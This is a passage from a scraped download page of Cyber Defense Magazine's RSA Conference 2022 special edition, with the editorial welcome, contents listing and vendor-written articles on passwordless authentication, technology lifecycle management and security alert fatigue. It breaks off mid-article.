CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF Free Download

Name: CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF
Author: its_timothy

1 / 295

1 views•295 pages

CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF Free Download

CYBER DEFENSE MAGAZINE - RSA CONFERENCE 2022-SPECIAL EDITION PDF free Download. Think more deeply and widely.

Welcome to CDM's RSA Conference 2022 Special Edition

On behalf of Cyber Defense Media Group and our affiliates, we are delighted to bring you this combined issue of

Cyber Defense Magazine for the RSA Annual Conference and the month of June 2022.

With over 10 years of successful publication, we are especially pleased to enjoy this ongoing, mutually supportive

relationship with the internationally recognized and respected RSA organization.

Given the apparent trend in cybersecurity to involve participants from beyond the world of cybersecurity

professionals, it’s appropriate to mention a few of the editorial guidelines by which CDM lives and operates.

Cyber Defense Magazine is and always has been a non-partisan, non-political publication. We encourage the

free exchange of ideas and expertise in cybersecurity and seek to provide our readers with the latest and most

actionable information available.

As distinguished from social media sites, we occasionally receive submissions from authors with diverse

viewpoints which may seem to be outside the norms of cybersecurity practice, or which tend to leave cyber issues

in favor of polemics. We make every effort to avoid any real or perceived censorship in choosing articles.

In general, it’s our editorial policy to restrict editing to typographical errors, grammar, and to do no modifications

to the authored content as submitted.

In that spirit, we wish to emphasize that any political or partisan or issue-related matters beyond cyber defense

professionalism are the views of the authors alone, and neither advocated for nor against by CDM.

We encourage CDM readers to read all articles objectively and reach your own conclusions, especially in this era

of freedom of speech issues.

Wishing you all success in your cybersecurity endeavors,

Yan Ross

U.S. Editor-in-Chief

Cyber Defense Magazine

About the Author

Yan Ross, J.D., is a Cybersecurity Journalist & Editor-in-Chief of Cyber Defense

Magazine. He is an accredited author and educator and has provided editorial

services for award-winning best-selling books on a variety of topics. He also

serves as ICFE's Director of Special Projects, and the author of the Certified

Identity Theft Risk Management Specialist ® XV CITRMS® course. As an

accredited educator for over 20 years, Yan addresses risk management in the

areas of identity theft, privacy, and cyber security for consumers and

organizations holding sensitive personal information. You can reach him by

e-mail at yan.ross@cyberdefensemediagroup.com

 
3 
 
 
Contents 
Welcome to CDM's RSA Conference 2022 Special Edition ...................................................... 9 
How Passwordless Can Help Us Win the Ransomware War .................................................. 14 
By Hemen Vimadalal is CEO and founder of 1Kosmos 
Security For Want of a Nail ................................................................................................... 18 
By Gregory Hoffer, CEO, Coviant Software 
Alert Fatigue Puts Your Organization at Risk; Here’s What to Do About It ............................. 24 
By Derek Nugent Vice President Sales, Marketing & Customer Success at Difenda 
How to Protect All Five Stages of the IoT Security Lifecycle ................................................. 31 
By Mitchell Bezzina, Senior Director, Product Marketing, Cloud-delivered Security Services, Palo Alto Networks 
More Than A “You’ve Been Breached Mentality” - Zero Trust, Quantum Computers, And the 
Future of Cyber .................................................................................................................... 35 
By Dr. Torsten Saab, Principal Engineering Fellow, Raytheon 
It’s time for Internet Providers to Become Primary Security Providers ................................. 38 
By Barry Spielman, Director of Product Marketing, Allot 
“Know your enemy,” and other cybersecurity lessons from Sun Tzu’s Art of War ................. 41 
By Shmulik Yehezkel (Colonel, res), Chief Critical Cyber Operations Officer at CYE Security 
Why Zero Trust is Easier Said Than Done ............................................................................. 45 
By John Vecchi, CMO, Anitian 
Why Are Cyber Insurance Premiums Going Up, And How Can You Get a Better Deal? ........... 48 
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group 
AI/ML Powered Risk Modeling: A Decision-Making Framework ........................................... 53 
By AJ Sarkar, Founder and CEO of OptimEyes.ai 
Feeling Beleaguered? 3 Practical Steps for Cybersecurity Mastery ...................................... 56 
By Tim Liu, Co-Founder & CTO, Hillstone Networks 

 
4 
 
 
 
 
 
The Most Common Types of Cyberattacks Plaguing SMBs An How to Protect Against Them
 ............................................................................................................................................ 60 
By Richard Clarke, Chief Insurance Officer, Colonial Surety 
Why A “Group of Rivals” Developed A Cybersecurity Taxonomy, And What It Buys You ........ 63 
By Charlie Miller, Senior Advisor, Shared Assessments, CTPRP, Distinguished Ponemon Fellow 
What is Business Email Compromise? .................................................................................. 69 
By Shanna Utgard, Senior Cyber Advocate, Defendify 
Firewalls Aren’t Enough to Protect Against Evolving Cyber Threats ...................................... 72 
By Pat McGarry, CTO, ThreatBlockr 
The Top Five Reasons You Should Take Operational Technology Cybersecurity Seriously ... 75 
By Matthew Morris, Global Managing Director, 1898 & Co.  
Not Slowing Down ................................................................................................................ 79 
By Kimberly Patlis Walsh, President and Managing Director of Corporate Risk Solutions (CRS)  
Advantage- Disadvantage Analysis for Implementing Cloud Services .................................. 84 
By Zsolt Baranya, Information Security Auditor, Black Cell Ltd.  
Reshape Security and Embrace Cyber Resilience with Hillstone Networks ........................... 89 
By Timothy Liu, CTO & Co-founder, Hillstone Networks 
Moving Beyond Budget Battles: The Real Secret to Improving National Cyber Defenses ...... 91 
By Teddra Burgess, SVP, Public Sector, Tanium 
Continuous Biometric Authentication Tool  Against Account Takeovers .............................. 96 
By Tamas Zelczer, CEO, Cursor Insight 
A Guide to Mitigating the Cyber Risks Posed by Refurbished Hardware ............................... 99 
By Eloïse Tobler MSc, Ecommerce Supervisor, Wisetek 
Acquiring Actionable Knowledge Through Collaboration .................................................... 103 
By Nicole Mills, Exhibition Director, Infosecurity Group 

 
5 
 
 
 
 
 
Darkweb Monitoring ........................................................................................................... 106 
By Kaustubh Medhe, Head of Research and Intelligence, Cyble 
Replacing Weak Authentication Methods with Decentralized Security Infrastructure: The Move 
Towards a Passwordless Future ........................................................................................ 109 
By Frances Zelazny, CEO of Anonybit 
The Password Is Dying. It’s Time for A DNR. ...................................................................... 112 
By Lucas Budman, CEO, TruU 
Analysing the true threat of Log4j ...................................................................................... 115 
By Tom McVey, Sales Engineer EMEA, Menlo Security 
Are We Shifting Left Enough .............................................................................................. 118 
By Douglas Kinloch, VP of Business Development, PACE Anti-Piracy 
Threats  Against  Critical  Infrastructure  Are  Looming,  Agencies  Must  Safely  Modernize  OT 
Systems ............................................................................................................................. 121 
By Josh Brodbent, Director of Public Sector Solutions Engineering, BeyondTrust 
Welcome To the Datagovops Revolution ............................................................................ 125 
By Ani Chaudhuri, CEO, Dasera 
Preventing Ransomware Attacks on Industrial Networks ................................................... 130 
By Michael Yehoshua, VP Marketing, SCADAfence 
Zero-Trust Architecture Is Incomplete Without Digital Signatures ...................................... 136 
By Geoff Mroz, Principal Digital Strategist, Adobe 
Trends To Ensure Cybersecurity In 2022 ............................................................................ 140 
By Héctor Guillermo Martínez, President of GM Sectec 
How Much Is Your Data Actually Worth? ............................................................................ 143 
By Jamie Wilson, MD & Founder, Cryptoloc Technology Group 
Airports, Bridges, and Beltways ......................................................................................... 149 
By Alan Cunningham, Journalist, Truth Be Told 

 
6 
 
 
 
 
 
Businesses Will Suffer Cyber-Attacks; But Do They Know the Real Cost? ........................... 152 
By Reuven Aronashvili, Founder & Chief Executive Officer at CYE 
aiXDR Brief ........................................................................................................................ 156 
By Randy Blasik, V.P. of Technology Solutions, Seceon Inc.  
Why Aren’t More Companies Capitalizing on Packet Capture? ........................................... 159 
By Cary Wright, VP of Product Management, Endace 
What Makes A USB Bad - And How Should Organizations Resolve This Risk? .................... 162 
By Jon Fielding, Managing Director, EMEA Apricorn 
eSentire  Discovers  Hackers  Spearphishing  Hiring  Managers  with  Resumes  Poisoned  with 
More_Eggs Malware ........................................................................................................... 165 
By Keegan Keplinger, Research and Reporting Lead, Threat Response Unit, eSentire 
Barriers To Entry Must Be Brought Down If More Women Are to Enter Cybersecurity ......... 169 
By Sydney Asensio, Head of Operations at 2020 Partners 
To Secure Saas, Combine Top Compliance Frameworks with An SSPM ............................. 172 
By Maor Bin, CEO & Co-Founder, Adaptive Shield 
Great Power Brings Great Responsibility: How to Keep Cloud Databases Secure in an Uncertain 
World ................................................................................................................................. 176 
By Bryan Alsdorf, Director of IT and Head of Information Security, MariaDB Corporation 
Cybersecurity: Why We’re Stronger Together ..................................................................... 181 
By Nicole Mills, Exhibition Director at Infosecurity Group 
Why Physical Security Should Be Part of a Cybersecurity Strategy ..................................... 184 
By David Weingot, Founder and CEO, DMAC Security 
Zero Trust Architecture: Adoption, Benefits, and Best Practices ........................................ 188 
By Harish Akali, Chief Technology Officer, ColorTokens 
Azure PostgreSQL User Databases Were Exposed Due to Critical Vulnerabilities ............... 195 
By Randy Reiter CEO of Don’t Be Breached 

 
7 
 
 
 
 
 
NFTS Are Cool but Dangerous ............................................................................................ 198 
By Guy Rosefelt, CPO, Sangfor Technologies 
The Need for Automated Remediation in Saas Security ...................................................... 201 
By Noam Shaar, Co-Founder & CEO, Wing Security 
Protect Your Executives’ Personal Digital Lives to Protect Your Company .......................... 206 
By Dr Chris Pierson, BlackCloak Founder & CEO 
It’s Time to Rethink Endpoint Security ................................................................................ 210 
By Carolyn Crandall, Chief Security Advocate, Attivo Networks 
Safeguarding Industrial Control Systems Environments ..................................................... 213 
By Ryan Lung, Senior product manager at TXOne Networks 
Securing Your Organization During Global Turmoil............................................................. 218 
By Kevin Orr, President, RSA Federal 
The Emergence of Dynamic Threat Hunting ....................................................................... 221 
By James “Jim” McMurry, CEO / Founder, Milton Security, Inc.  
Zero Trust: Security Model for A Fluid Perimeter ............................................................... 227 
By Debanjali Ghosh, Technical Evangelist, ManageEngine 
Welcome to the Cyber Defense Global InfoSec Awards for 2022 ........................................ 233 
 
 
   

CYBER DEFENSE MAGAZINE

is a Cyber Defense Media Group (CDMG) publication distributed

electronically via opt-in GDPR compliance-Mail, HTML, PDF, mobile

and online flipbook forwards All electronic editions are available for

free, always. No strings attached. Annual EDITIONs of CDM are

distributed exclusively at the RSA Conference each year for our USA

editions and at IP EXPO EUROPE in the UK for our Global editions.

Key contacts:

PUBLISHER

Gary S. Miliefsky

garym@cyberdefensemagazine.com

V.P. BUSINESS DEVELOPMENT

Olivier Vallez

olivier.vallez@cyberdefensemagazine.com

V.P. STRATEGIC INITIATIVES

John Rafuse

jr@cyberdefensemediagroup.com

EDITOR-IN-CHIEF

Yan Ross

yan.ross@cyberdefensemediagroup.com

MARKETING, ADVERTISING & INQUIRIES

marketing@cyberdefensemagazine.com

Interested in writing for us:

marketing@cyberdefensemagazine.com

Cyber Defense Magazine

Toll Free: +1-833-844-9468

International: +1-603-280-4451

New York (USA/HQ): +1-646-586-9545

London (UK/EU): +44-203-695-2952

Hong Kong (Asia): +852-580-89020

Skype: cyber.defense

E-mail: marketing@cyberdefensemagazine.com

Awards: www.cyberdefenseawards.com

Conferences: www.cyberdefenseconferences.com

Radio: www.cyberdefenseradio.com

TV: www.cyberdefensetv.com

Webinars: www.cyberdefensewebinars.com

Web: www.cyberdefensemagazine.com

(CDM), a Cyber Defense Media Group (CDMG)

publication of the Steven G. Samuels LLC Media Corporation.

To Reach Us Via US Mail:

Cyber Defense Magazine

276 Fifth Avenue, Suite 704

New York, NY 10001

EIN: 454-18-8465

DUNS# 078358935

Welcome to CDM's RSA Conference 2022 Special Edition

June 6 kicks off our 31st RSA Conference, and we’re so excited to be back in-person at the Moscone Center

and to see our colleagues, peers and friends from around the world. We’re also pleased to offer a Digital

Pass for those who aren’t able to join us in person.

For over three decades, the Conference has served as a hub for the cybersecurity industry, bringing together

a wide array of professionals across all sectors and industries. This year’s theme, TRANSFORM – speaks to

how we, as a community, have transformed. We’ve gone from behind-the-scenes professionals focused on

strengthening walls to business enablers entrusted to make game-changing decisions. And as the world

becomes more digitized, it looks to us for protection and response.

This year, you’ll find an impressively diverse and richly informative agenda comprised of 25 tracks with more

than 350 sessions presented by over 600 industry experts. Between the West and South Stage keynotes, we

have some of the most esteemed leaders who will inspire, inform and motivate this year’s attendees to think

more deeply about both industry and personal transformations. But it doesn’t stop there. Once again,

attendees will have the chance to witness the next generation of cybersecurity innovators at the RSAC

Innovation Sandbox. The impact of the competition has always extended far beyond the Conference stage

and this year will be no different. We also know how important networking is to our attendees, and RSA

Conference 2022 will be loaded with opportunities to interact and collaborate with peers, sponsors, and

experts. And in addition, this year’s Expo will host more than 400 exhibitors showcasing a myriad of cutting-

edge solutions along with the RSAC Early Stage Expo with 35 of the industry’s most promising startup

companies!

As technology and innovation continue to transform the world around us, we must keep pace with those

changes and lead as an industry. We look forward to seeing you at RSAC this year.

Linda Gray Martin

Vice President, RSA Conference

Approximately $590 million in ransomware payments were made in the U.S. in the first six months of

2021, more than the $416 million reported for the whole of 2020, according to a Reuters report.

And it's no surprise that stolen credentials are the primary means by which criminals hack into

organizations. In fact, the Verizon 2021 Data Breach Investigations Report noted that 61 percent of

breaches are attributed to compromised credentials.

Problem is: most companies are mired in the traditional approach that uses an authentication method

(such as a password, a one-time passcode, etc.) as a proxy for a user’s identity. Let’s consider the

shortcomings of this model.

Passwords have been around for roughly 60 years and are easily compromised via phishing attacks,

social engineering or simple carelessness, and many people reuse them across different systems.

How Passwordless Can Help Us Win the

Ransomware War

By Hemen Vimadalal is CEO and founder of 1Kosmos

Meanwhile, two-factor authentication doesn't prove identity at all. Instead, it simply provides hope … that

email accounts, devices and apps haven’t been hacked.

Strong authentication using biometrics shows great promise in replacing passwords by moving beyond

the “something you know” or knowledge factor to the “something you are” or inherence factor. These

include physical characteristics (typically facial, fingerprint, or voice recognition) to verify a user's identity.

However, capturing user biometrics is one thing. Securing them is a completely different challenge,

because, just like passwords, digitized biometrics can be stolen.

Passwordless is the Future

Recent breakthroughs in standards and technologies make passwordless authentication not only

possible but cost-effective and convenient.

For example, NIST standard 800-63-3B covers how users can use enrolled identities to authenticate who

they are without usernames or passwords. The industry term for this is passwordless authentication.

Meanwhile, passwordless authentication has been popularized by the Fast Identity Online Alliance

(FIDO), a non-profit industry consortium supported by such companies as Google and Microsoft.

Its main standard is FIDO2, which enables users to store their biometrics behind a cryptographically

secured public-private key pair. The private key is stored in the Trusted Platform Module or Secure

Enclave of the device. That key (what you have) combined with a biometric such as TouchID, FaceID or

LiveID (what you are) become the two factors needed to verify the user can be trusted to access an

online service.

For passwordless to work, certified authentication must enable a high level of certainty of the identity at

the end of a connection. Thus, identity becomes key to the security perimeter of an organization, and

removes the anonymity behind compromised credentials, which is also central to help organizations

move to a zero-trust architecture.

To ensure the success of passwordless authentication, the biometric must be sophisticated and non-

hackable. A “live selfie” is a must, using technology that detects depth of field, specific facial movements,

and all signs of photo and video manipulation.

The authentication mechanism needs to have a high degree of interoperability and be easily integrated

with operating systems, user stores, devices, SSO, and other applications preferably via API / SDK.

As a user biometric represents a high value target for hackers, they should also be stored as safely as

possible.

Centralized administration provides a honeypot target ripe for ransomware, hacking, etc. Conversely

distributed ledgers offer a vastly superior approach to security and facilitates user privacy in management

and control of their own information.

Conclusion

Passwordless authentication results in a user-friendly computing experience that is highly resistant to

credential theft. It eliminates significant threats posed by unauthorized users logged into the corporate

IT network — including data breaches, ransomware, commercial espionage, and financial fraud.

From an organizational perspective, passwordless authentication with identity simplifies IAM IT

architectures centered on passwords and 2FA security. More importantly, it helps organizations answer

with certainty the key question of “Who is logging into my digital services?”

About the Author

Hemen Vimadalal is CEO and founder of 1Kosmos, which unifies

identity and authentication to provide a passwordless and

frictionless user experience for employees and consumers. Prior

to 1Kosmos, Hemen founded Simeio Solutions and Vaau, both

of which had very successful exits. He is also an angel investor

in cyber security companies including Securonix, Saviynt,

BrinQa, Simeio, and others.

Security For Want of a Nail

Don’t Overlook Lifecycle and Data Management Details

By Gregory Hoffer, CEO, Coviant Software

Threat actors are a relentless bunch. They continue to evolve their tools and practices to try and stay one

step ahead of the influx of sophisticated countermeasures designed to detect and fend off their attacks;

and they have a great incentive to be good at what they do. By some estimates, cybercrime as an industry

grosses more than $600 billion annually. That’s a lot of money, and a lot of motivation.

But for all the attention paid to high-skill threat actors and the technologies built to thwart them, there are

a lot of hackers that are content with looking for targets of opportunity and who would prefer taking

advantage of more common weaknesses in plying their trade. They know that, even the largest

organizations with the biggest cybersecurity budgets can overlook simple things that make it possible for

them to breach the wall, get inside, and do their thing.

A Common Weakness

One area that is a common weakness in enterprise security is lack of attention to technology lifecycle

management. The practice of keeping a meticulous inventory of what hardware, software, and

applications an organization is running, and then making sure everything is up-to-date, patched, and then

properly retired when obsolete or no longer needed is not one of the more glamorous aspects of

cybersecurity, but it is a vital component to a successful security strategy.

The results of poor tech lifecycle management were illustrated when the financial services firm Morgan

Stanley was hit with a $60 million fine by the U.S. Comptroller of the Currency in October of 2020 for

improper disposal of servers from a data center the company had decommissioned. Some of the

equipment was sold to a third-party and found to still contain unsecured customer data for as many as

15 million customers. That led to a class action lawsuit in which the courts found in favor of the plaintiffs

for an additional $60 million announced on January 3, 2022.

While it is unclear whether the personally identifiable information (PII) of those customers was unsecured,

or if the security status of the data was simply unverifiable, authorities require evidence of encryption,

and so the assumption is that the data was compromised. A thorough lifecycle management process

would have prompted the data on those systems to be rendered unrecoverable, and with proper data

management processes in place, actions like encryption and documentation would have provided an

auditable record to satisfy regulators that security and privacy laws were followed.

Meticulous Management

That is why it’s important to meticulously manage data—and the systems that store and move it—in order

to avoid these kinds of incidents. When older technologies become obsolete, and their makers decide to

end support, those systems become vulnerable to cybercriminals who target organizations known to use

them. The dangers of using old, unsupported tech were illustrated when, in early 2020, an unsupported

version of a file transfer appliance sold by Accellion was the focus of attacks by ransomware gangs.

Organizations around the world were affected, including retail, industrial, healthcare, academic,

government, and financial services. (Coincidentally, Morgan Stanley was one of the organizations

breached by attacks on the vulnerable appliance.)

Of course, technology lifecycle management is the responsibility of both the vendor and the user and

information from a vendor is critical to preparing for and responding to issues like patching, end of

support, and upgrades. While reports suggest that Accellion may have been less than forthcoming with

the status of their technology, another vendor in the data management space demonstrated a more

responsible posture when it decided to discontinue one of its products.

Plan for End-of-Life

In August of 2020, Qlik announced that its RepliWeb file transfer software product would reach its end-

of-life on January 31, 2021, and support for the product would cease at that time. Qlik was open with its

customers about the implications of the decision, giving them ample time to prepare for that date and find

a replacement for the file transfer function many organizations rely on.

Mozilla is another example of a company that discontinued support for a popular technology when it

announced last year that it would no longer support file transfer protocol (FTP) in version 90 of the popular

Firefox browser. That move followed the same decision by Google in December 2020 when it ended FTP

support for Chrome version 88. For organizations not paying attention, the lack of support for FTP in

those browsers could have serious security consequences. According to a ZDNet article, while FTP

remains a popular option for moving files between computers, the protocol is “burdened by enough

security issues that browser makers are dropping support for the protocol.”

Among the issues, files transferred via FTP are sent unencrypted, and FTP has also been used as an

attack vector in malware campaigns according to a statement by Mozilla’s security team, which read,

“The biggest security risk is that FTP transfers data in cleartext, allowing attackers to steal, spoof and

even modify the data transmitted. To date, many malware distribution campaigns launch their attacks by

compromising FTP servers and downloading malware on an end user’s device using the FTP protocol.”

Don’t Risk DIY

These issues highlight the importance of managing technology’s use and lifecycle. It also means making

sure the right tool is being used for important business processes, rather than trying to make do with

“close enough” products, or engineering do-it-yourself solutions. After all, FTP is still used for many

legitimate business transactions, and for someone with the right skills FTP can be secured and

automated. But even if can write the scripts necessary to tackle those functions, knowledge of the

nuances that need to be addressed for compliance is vital.

The shortcomings of the DIY approach may not be evident until there’s a breakdown in the process, such

as a transfer that fails, an alert that is missed, a security issue occurs, or there is call for a feature that

wasn’t considered when the custom scripts were written. That’s when risks increase—along with costs.

When it comes to file transfers, the approach an organization chooses can have implications on data

lifecycle management. Through process automation, a secure, managed file transfer (MFT) platform can

be used to ensure files are encrypted before being moved, and also upon receipt. And the ability to

automatically document all the steps in the send, receive, store, and retrieve process goes a long way

toward affirming compliance with regulations like Sarbanes-Oxley (SOX), Gramm-Leach-Bliley (GLBA),

the Health Insurance Portability and Accountability Act (HIPAA), Europe’s General Data Privacy

Regulation (GDPR), and other state, federal, and international laws.

Secure MFT is not a remedy to all of an organization’s security and data management issues, but it can

play an important role in maintaining a strong data security and data management program. It can also

help mitigate the risks of relying on human intervention, which often leads to mistakes and oversights

that can result in a costly data breach or a finding of non-compliance.

Reasonable Refresh

The good news is, these are not tools or processes that are beyond the reach of organizations operating

on smaller or constrained budgets, or that are understaffed. Nor do they require a “forklift upgrade”

technology refresh to achieve. In fact, a simple tech refresh may be all that is needed to address a specific

need and achieve gains in productivity and security. A recent column in the tech trade journal

Computerworld identified five reasons for a simple tech refresh, including:

• Lack of Vendor Support for Older Systems;

• Support Employee Remote Access;

• Security Vulnerability Mitigation;

• Enable Regulatory Compliance; and,

• Improve Ease-of-Use.

Making changes necessary to address common-sense issues, like fixing or updating hardware, software,

or applications to keep pace with change is a necessary aspect of managing any organization’s IT estate

and to keeping data and systems secure. In fact, those changes are to be expected, and may only be a

minor nuisance. If you are responsible for managing your organization’s IT, it is not a good idea to put off

updates, additions, or replacements of technologies.

For Want of a Nail

There’s an old poem called For Want of a Nail that describes the catastrophic potential when a seemingly

simple detail is overlooked.

For want of a nail the shoe was lost.

For want of a shoe the horse was lost.

For want of a horse the rider was lost.

For want of a rider the message was lost.

For want of a message the battle was lost.

For want of a battle the kingdom was lost.

And all for the want of a horseshoe nail.

Don’t let a seemingly minor detail in your technology lifecycle management or data management program

be the missing nail that cascades into a major event like a data breach. Pay attention to the small things

and your organization’s security posture will improve.

About the Author

Gregory Hoffer is CEO of Coviant Software, maker of the secure,

managed file transfer platform Diplomat MFT. Greg’s career

spans two decades of successful organizational leadership and

award-winning product development. He was instrumental in

establishing ground-breaking technology partnerships that helped

accomplish Federal Information Processing Standards (FIPS), the

DMZ Gateway, OpenPGP, and other features essential for

protecting large files and data in transit.

For more information visit Coviant Software online, or follow

Coviant Software on Twitter and LinkedIn.

Alerts, notifications, and non-stop calls from shady

telemarketers pitching extended warranties – we

all get more alerts each day than we can manage.

For security professionals, the flood of alerts is

even worse, much worse, extending to the

essential tools they need to do their jobs.

The negative impacts of this deluge of alerts are

felt anytime an overworked security professional

suffering from “alert fatigue” neglects to block an

attacker or detect malware because the signals

were ignored or simply lost amidst the noise.

What Causes Alert Fatigue?

There are five main drivers of alert fatigue:

• Security Technology Creep

• Explosion of Automated Attacks

• Ineffective Configuration and Use of Tools

• Global Threat Landscape Events

• Limited Resources to Devote to the Problem

Each new layer of security that businesses add to address evolving security risks generates its own

stream of notifications, alerts, and alarms. Some are actionable, many are not. Antivirus, IPS software,

and firewalls, to name only a few layers, all generate alerts that tend to be poorly correlated.

Due to the unbalanced nature of security defense vs. cyber-attackers on offense, security solutions tend

to be overly sensitive by design, which makes alert fatigue inevitable. After all, attackers need only be

Alert Fatigue Puts Your Organization

at Risk; Here’s What to Do About It

By Derek Nugent Vice President Sales, Marketing & Customer Success at Difenda

successful once in order to severely damage a business, while the organization’s security team must

ward off attacks 24x7x365 to be successful.

As a result, security analysts, who are already coping with too many responsibilities and too few

resources, must constantly cope with alert fatigue, which leads to critical alerts being missed at an

alarmingly high rate. Alert overload not only increases your organization’s overall cybersecurity risks, but

also results in low job satisfaction and high turnover for burned out employees.

COVID-19, Digital Transformation Drive Spike in Alerts

When experts study enterprise security, they find a few troubling trends that directly cause an increase

of alert overload. First, as enterprises continue to migrate applications and data to the cloud as part of

digital transformation initiatives, new security protections are added, often from new vendors.

The Cloud Security Alliance’s recent report, “State of Cloud Security: Concerns, Challenges, and

Incidents,” found that as remote workforces grew, so too did the reliance on additional cloud-delivered

security tools and virtual firewalls. The report found that “the use of cloud providers’ additional security

controls jumped from 58% in 2019 to 71% in 2021.”

The report’s authors believe that due to the current health crisis and the dramatic increase in remote

work, many organizations are unable to secure their networks – which are often hybrid ones with a mix

of legacy on-premises, public cloud, and private cloud infrastructure – using only traditional tools.

Therefore, organizations have had no choice but to add new security controls, each of which generates

new alerts.

More than 5000 Daily Security Alerts, and that Was Before COVID

Now, consider that before the pandemic hit Cisco found in its "2017 Annual Cybersecurity Report” that

44% of security operations managers were already inundated with more than 5000 security alerts per

day. In other words, alert fatigue was the new normal before remote workforces exploded and digital

transformation and cloud migration initiatives accelerated.

The study also found that most companies used more than five security products in their environment,

and those products often came from more than five security vendors. A full 65% of enterprises surveyed

used six or more security products, while more than half (55%) of those surveyed reported they had to

respond to alerts from at least six different vendors.

A 2019 study by CCS Insights of 400 senior IT leaders found that in enterprises with more than 1,000

employees the thicket of tools security teams must manage is even more complicated. CCS Insights

found that the average large business had more than 70 different security products from 35 different

suppliers, and while most enterprises intend to consolidate security, the consolidation trend has yet to

get started in any significant way.

 
26 
 
As  we  start  to  emerge  from  the  pandemic,  security  infrastructure  isn’t  getting  any  simpler  and  alert 
volumes aren’t getting any easier to manage.  
According  to  a  recent  survey  of  nearly  400  security  operations  professionals  (commissioned  by 
Siemplify), 42% report that their alert volumes are higher now than before the pandemic, while 51% say 
investigating  suspicious  activities  has  become  a  much  bigger  challenge  in  remote  and  hybrid 
environments. 
Unfortunately, a number of factors threaten to add to the problem of alert fatigue in the near-term. These 
include but are not limited to the normalization of remote and mobile workforces, the rise of state-
sponsored  malware  and  hacks  related  to  Russia’s  invasion  of  Ukraine,  and  easy  access  to  and 
automation of sophisticated hacking tools. At the same time, entire classes of threats are on the rise, 
including  critical  infrastructure  attacks,  ransomware,  cloud  storage  leaks,  and  business  email 
compromise attacks (BECs).  
Thus, the volume of alerts will continue to rise and so too will the probability that your security team will 
eventually miss something critical, leading to a hack, a costly data breach, or some other negative 
outcome.  
Unfortunately, another thing on the rise in parallel to alert overload is the cost of those negative outcomes. 
For instance, IBM and the Ponemon Institute’s annual “Cost of a Data Breach Report” found that the cost 
of an average data breach rose from $3.86 million in 2020 to $4.24 million in 2021, the highest average 
total cost in the 17-year history of the report.  
 
How Microsoft Tackles Alert Fatigue 
One  shortcut  to  reducing  alert  fatigue  is  through  vendor  consolidation.  For  instance,  for  those 
organizations already dependent on Microsoft productivity tools and Azure Cloud, it makes sense to 
consolidate on that platform.  
Soon after investing heavily in its Azure cloud platform, Microsoft also saw the need to tightly integrate 
security into its cloud stack, rather than layering it on afterwards. Thus, in recent years, Microsoft has 
invested $1 billion in security development, and their investment has already earned recognition from 
top-tier industry analysts. For instance, research firm Gartner lists Microsoft as a “leader” in a number of 
its Magic Quadrant reports, including end point protection, access management, CASB, and more. 
Microsoft has also mapped out a strategy to avoid alert fatigue, a strategy that can help your organization 
regain control over alert flows.  
Microsoft recommends adopting technologies such as Artificial Intelligence (AI) and Machine Learning 
(ML) to help find signal in the alert noise. Organizations should automate as many error-prone, repetitive 
tasks as possible in their SOCs, maintain up-to-date watch lists to prioritize activities from known bad 
actors, and adopt cloud-native solutions for better integration.  
For organizations already struggling with limited IT resources, however, there are a few other steps you 
can follow to mitigate alert fatigue. The seven steps outlined below will help your organization alleviate 

alert fatigue in a way that should align with initiatives already underway, such as digital transformation

and cloud migration.

7 Ways to Mitigate Alert Fatigue

1. Consolidate security tools and vendors

Managing multiple security tools from multiple vendors becomes much easier if you take a platform

approach to security and then build on that platform with best-in-class tools from the same vendor and/or

its vetted partners.

At my company Difenda, we decided to build our SecOps-as-a-Service around Microsoft security tools

not only because so many of them are best in class, but also because we believe that a consolidated

security approach is the only way to keep ahead of the problems created by an increasingly complex

threat environment.

Consolidated security stacks from single vendors and their certified partners will provide you with a unified

dashboard that makes it easier to correlate various alerts, while also making it less likely that

interoperability will undermine your defenses.

2. Integrate that which cannot be consolidated

Whatever vendor you decide to use as the foundation of your security stack – Microsoft or otherwise –

should be one with robust protections against a range of threats that also integrates easily with other

tools, offering your organization an easy way to pull other alerts from third-party tools into a unified

dashboard. Ideally, AI or ML capabilities will then automatically correlate those alerts with those from the

rest of your security stack.

Look for certified partners who have been tested for interoperability, and in the rare cases you need

something from outside of that ecosystem, be sure that the security tool offers open APIs. Before adopting

any new tools, it’s also a good idea to research what existing users have to say about “vendor lock” and

“lack of integration” before you commit to any new security vendors.

3. Embrace continuous security improvements

The core tenets of the agile software development movement apply equally well to security, especially

when it comes to reducing alert fatigue: prioritize individuals over tools, iterate quickly, receive and act

on real-world feedback quickly, and more.

One core tenet of agile is especially important for security: continuous improvement.

The security threat landscape and tools monitoring it will never stop evolving, so organizations will need

to adopt processes that enable them to adapt quickly to stay ahead of the threat curve.

4. Automate, automate, automate

Automation is another key principle for achieving agile security operations, and it’s one that Microsoft

stresses in its alert fatigue mitigation plan. For most large organizations, automation is necessary to even

begin to alleviate alert fatigue. In a tight labor market, there simply are not enough skilled security experts

available to tackle a problem of this scale unless manual, repetitive processes are automated. For alert

fatigue, automating things like basic alert correlation, checking alerts against watch lists, and

automatically ingesting patches and updates are all activities that should be automated to free up security

professionals to focus on other activities, such as threat hunting and remediation.

5. Include compliance as part of your automation efforts

In heavily regulated industries, many security alerts may directly tie back to your regulatory obligations,

but even if your business doesn’t need to comply with laws like PCI-DSS or HIPAA, new consumer

privacy laws, such as the GDPR in Europe and the CCPA in California, add obligations, and thus risks,

for a large swath of the economy.

As you seek to automate security tasks, be sure to investigate ways to tie compliance into the process,

which will streamline the overall process and reduce risks. For instance, Microsoft’s Purview Compliance

Manager helps organizations integrate compliance with security operations, ensuring that they keep up

with changing regulatory requirements and shifting risks.

6. Intelligently prioritize incident response

Not all alerts are created equal, and even actionable ones don’t all carry the same level of risk. Thus, it’s

important to prioritize the systems and applications that pose the biggest risks if breached or otherwise

damaged.

Prioritizing known attack vectors, actively watching for known high-risk behaviors like privileged access,

and maintaining an active watch list of known high-risk attackers will significantly cut down response

times by focusing your team on the most pressing, high-risk threats.

As you investigate how to reduce alert fatigue, be sure your security provider offers a Configuration

Management Database (CMDB) to provide real-time visibility into all of your networked assets. Ideally,

your CMDB should automatically track the changing state of those assets (patches, updates, etc.) and

correlate them with vulnerability scans and threat hunts.

7. Outsource alert management to a security provider that offers Managed Detection and

Response (MDR) services

A common cause of alert fatigue can be traced back to limited resources. If your organization does not

have a large enough staff to manage SOC activities, you may have a hard time recruiting and retaining

staff in this tight labor market.

